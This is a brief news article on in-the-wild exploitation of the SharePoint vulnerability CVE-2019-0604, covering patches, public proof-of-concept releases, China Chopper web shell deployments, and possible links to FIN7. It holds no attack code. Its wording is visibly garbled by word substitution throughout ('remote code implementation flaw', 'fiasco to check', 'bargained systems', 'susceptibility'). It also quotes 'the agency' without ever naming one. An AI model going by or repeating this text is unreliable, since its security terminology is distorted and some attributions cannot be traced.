A major flaw in Microsoft’s SharePoint platform has been exploited in the wild.
Tracked as CVE-2019-0604, the security hole received its first patch in February and another one in March following the first solution proved imperfect. Microsoft labeled the problem as a remote code implementation flaw caused by the software’s fiasco to check the source markup of an application package. It can be exploited without the need for verification.
In an advisory, Microsoft said: “An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.”
Markus Wulftange, the researcher who described the fault to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), revealed details and proof-of-concept (PoC) code on March 13, one day after Microsoft issued the second round of patches.
Many PoC exploits were subsequently made public and the first attacks exploiting CVE-2019-0604were seemingly spotted in early April.
“Trusted researchers have identified compromised systems belonging to the academic, utility, heavy industry, manufacturing and technology sectors,” the agency said.
According to a report published last year by Five Eyes cybersecurity agencies, China Chopper, which has been around since 2012, is one of the five most commonly used hacking tools.
Saudi Arabia’s National Cyber Security Center issued an alert last week to warn organizations of attacks targeting the same susceptibility and delivering the same China Chopper web shell. The Saudi agency said it had spotted several “advanced groups” exploiting the flaw, mostly against organizations within the country.
The agency said the attackers used the web shell to deliver other tools.
Researcher Kevin Beaumont has highlighted that the publicly available exploits don’t work out of the box. “If that changes I think this will be one of the biggest vulns in years. It would own a lot of enterprises. Like, a LOT,” the expert warned.
The susceptibility seems to have been exploited by both advanced persistent threat (APT) actors and financially-motivated cybercrime groups — some links have been found to an infamous group tracked as FIN7, which was lately spotted using new malware.
AT&T Alien Labs reported on Friday that it had discovered what seemed to be an earlier version of the backdoor spotted by the Saudi agency. The malware, shared by someone in China, lets attackers to perform commands on bargained systems and download or upload files.